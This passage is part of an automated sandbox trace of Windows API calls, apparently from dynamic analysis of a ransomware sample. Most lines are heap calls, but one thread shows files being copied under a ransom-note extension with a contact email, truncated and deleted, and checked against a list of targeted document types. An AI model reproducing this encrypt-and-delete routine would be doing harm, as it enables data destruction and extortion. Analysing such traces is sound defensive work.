dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.879] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.879] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.880] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.880] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.880] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.880] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.880] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.880] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.880] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.880] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.881] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.881] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.881] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.881] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.881] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.881] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.881] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.881] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.882] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.882] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.882] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.882] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.882] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.882] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.882] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.882] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.883] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.883] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.883] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.884] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.884] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.884] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.885] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.885] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.885] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0069.890] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0069.894] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0069.916] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0069.918] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.919] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.919] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.920] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0069.925] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0070.366] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0070.366] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0070.367] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0070.367] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0070.653] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0070.654] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0070.654] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0070.655] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4291078 | out: hHeap=0x5d0000) returned 1 [0070.658] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4291078 | out: hHeap=0x5d0000) returned 1 [0070.819] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0070.819] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4291078 | out: hHeap=0x5d0000) returned 1 [0070.824] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0070.827] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0070.827] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0070.830] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0070.832] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0070.832] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0070.832] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0070.832] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0070.832] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0070.834] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0070.835] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4291078 | out: hHeap=0x5d0000) returned 1 [0071.144] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4424e98 | out: hHeap=0x5d0000) returned 1 [0071.144] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43f4e80 | out: hHeap=0x5d0000) returned 1 [0071.144] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43f4e80 | out: hHeap=0x5d0000) returned 1 [0071.144] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0071.147] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0071.147] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0071.148] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0071.149] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0071.155] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0071.155] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0071.155] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0071.156] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4424e98 | out: hHeap=0x5d0000) returned 1 [0071.156] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43f4e80 | out: hHeap=0x5d0000) returned 1 [0071.156] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4424e98 | out: hHeap=0x5d0000) returned 1 [0071.157] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43f4e80 | out: hHeap=0x5d0000) returned 1 [0071.157] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43f4e80 | out: hHeap=0x5d0000) returned 1 [0071.157] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43f4e80 | out: hHeap=0x5d0000) returned 1 [0071.159] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43f4e80 | out: hHeap=0x5d0000) returned 1 [0071.161] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43f4e80 | out: hHeap=0x5d0000) returned 1 [0071.161] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43f4e80 | out: hHeap=0x5d0000) returned 1 [0071.164] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4424e98 | out: hHeap=0x5d0000) returned 1 [0071.166] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4424e98 | out: hHeap=0x5d0000) returned 1 [0071.382] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d50a0 | out: hHeap=0x5d0000) returned 1 [0071.383] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e50a8 | out: hHeap=0x5d0000) returned 1 [0071.383] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d50a0 | out: hHeap=0x5d0000) returned 1 [0071.383] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4424e98 | out: hHeap=0x5d0000) returned 1 [0071.384] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4424e98 | out: hHeap=0x5d0000) returned 1 [0071.386] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d3098 | out: hHeap=0x5d0000) returned 1 [0071.386] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4424e98 | out: hHeap=0x5d0000) returned 1 [0071.387] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43f4e80 | out: hHeap=0x5d0000) returned 1 [0071.387] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43f4e80 | out: hHeap=0x5d0000) returned 1 [0071.388] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4424e98 | out: hHeap=0x5d0000) returned 1 [0071.389] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42d3098 | out: hHeap=0x5d0000) returned 1 [0071.389] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4424e98 | out: hHeap=0x5d0000) returned 1 [0071.389] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43f4e80 | out: hHeap=0x5d0000) returned 1 [0071.390] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43f4e80 | out: hHeap=0x5d0000) returned 1 [0071.390] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43f4e80 | out: hHeap=0x5d0000) returned 1 [0072.278] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0072.278] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0072.278] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 Thread: id = 14 os_tid = 0xd44 [0045.431] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x3c10728 [0045.432] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x3c20730 [0045.432] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62cf68 [0045.432] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6) returned 0x65d090 [0045.432] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62cdd0 [0045.432] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x100000) returned 0x3cf9020 [0045.434] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62ce48 [0045.434] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62ce48, Size=0x20) returned 0x60e9d0 [0045.434] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62cef0 [0045.435] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62cef0, Size=0x20) returned 0x60ea20 [0045.435] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0045.435] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0045.435] Wow64DisableWow64FsRedirection (in: OldValue=0x2f8ff50 | out: OldValue=0x2f8ff50*=0x0) returned 1 [0045.435] lstrlenW (lpString="kernel32.dll") returned 12 [0045.435] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e9d0 | out: hHeap=0x5d0000) returned 1 [0045.435] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0045.435] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60ea20 | out: hHeap=0x5d0000) returned 1 [0045.435] Sleep (dwMilliseconds=0x64) [0045.634] Sleep (dwMilliseconds=0x64) [0045.799] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0045.799] lstrlenW (lpString="GetCurrentOOBE.dll") returned 18 [0045.799] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0045.952] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=144072) returned 1 [0045.952] CloseHandle (hObject=0x2d4) returned 1 [0045.952] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll")) returned 0x20 [0045.952] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0045.952] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0045.952] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0045.952] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0045.952] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0046.509] GetLastError () returned 0x0 [0046.517] ReadFile (in: hFile=0x2d4, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x232c8, lpOverlapped=0x0) returned 1 [0046.530] WriteFile (in: hFile=0x2dc, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x232d0, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x232d0, lpOverlapped=0x0) returned 1 [0046.533] ReadFile (in: hFile=0x2d4, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.533] WriteFile (in: hFile=0x2dc, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0xf8, lpOverlapped=0x0) returned 1 [0046.533] SetEndOfFile (hFile=0x2dc) returned 1 [0046.533] CloseHandle (hObject=0x2dc) returned 1 [0046.537] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.537] SetEndOfFile (hFile=0x2d4) returned 1 [0046.538] CloseHandle (hObject=0x2d4) returned 1 [0046.538] SetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0046.539] DeleteFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll")) returned 1 [0046.539] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0046.539] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0046.539] lstrlenW (lpString=".doc") returned 4 [0046.539] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.539] lstrlenW (lpString=".docx") returned 5 [0046.539] lstrcmpiW (lpString1=".docx", lpString2="E.dll") returned -1 [0046.539] lstrlenW (lpString=".pdf") returned 4 [0046.539] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.539] lstrlenW (lpString=".xls") returned 4 [0046.539] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.539] lstrlenW (lpString=".xlsx") returned 5 [0046.539] lstrcmpiW (lpString1=".xlsx", lpString2="E.dll") returned -1 [0046.539] lstrlenW (lpString=".ppt") returned 4 [0046.539] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.539] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0046.539] lstrlenW (lpString=".zip") returned 4 [0046.539] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.539] lstrlenW (lpString=".rar") returned 4 [0046.540] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.540] lstrlenW (lpString=".bz2") returned 4 [0046.540] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.540] lstrlenW (lpString=".7z") returned 3 [0046.540] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.540] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0046.540] lstrlenW (lpString=".dbf") returned 4 [0046.540] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.540] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0046.540] lstrlenW (lpString=".1cd") returned 4 [0046.540] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.540] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0046.540] lstrlenW (lpString=".jpg") returned 4 [0046.540] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.540] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0046.540] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0046.540] lstrlenW (lpString=".doc") returned 4 [0046.540] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.540] lstrlenW (lpString=".docx") returned 5 [0046.540] lstrcmpiW (lpString1=".docx", lpString2="E.dll") returned -1 [0046.540] lstrlenW (lpString=".pdf") returned 4 [0046.540] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.540] lstrlenW (lpString=".xls") returned 4 [0046.540] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.540] lstrlenW (lpString=".xlsx") returned 5 [0046.540] lstrcmpiW (lpString1=".xlsx", lpString2="E.dll") returned -1 [0046.540] lstrlenW (lpString=".ppt") returned 4 [0046.540] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.540] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0046.540] lstrlenW (lpString=".zip") returned 4 [0046.540] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.541] lstrlenW (lpString=".rar") returned 4 [0046.541] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.541] lstrlenW (lpString=".bz2") returned 4 [0046.541] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.541] lstrlenW (lpString=".7z") returned 3 [0046.541] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.541] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0046.541] lstrlenW (lpString=".dbf") returned 4 [0046.541] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.541] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0046.541] lstrlenW (lpString=".1cd") returned 4 [0046.541] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.541] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0046.541] lstrlenW (lpString=".jpg") returned 4 [0046.541] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.541] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0046.541] lstrlenW (lpString="SetupResources.dll") returned 18 [0046.541] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0046.542] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=18264) returned 1 [0046.542] CloseHandle (hObject=0x2d4) returned 1 [0046.542] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll")) returned 0x80 [0046.542] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.542] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0046.542] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.542] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.542] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0046.544] GetLastError () returned 0x0 [0046.544] ReadFile (in: hFile=0x2d4, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x4758, lpOverlapped=0x0) returned 1 [0047.005] WriteFile (in: hFile=0x2dc, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x4760, lpOverlapped=0x0) returned 1 [0047.014] ReadFile (in: hFile=0x2d4, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.014] WriteFile (in: hFile=0x2dc, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0xf8, lpOverlapped=0x0) returned 1 [0047.015] SetEndOfFile (hFile=0x2dc) returned 1 [0047.015] CloseHandle (hObject=0x2dc) returned 1 [0047.053] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.053] SetEndOfFile (hFile=0x2d4) returned 1 [0047.054] CloseHandle (hObject=0x2d4) returned 1 [0047.054] SetFileAttributesW 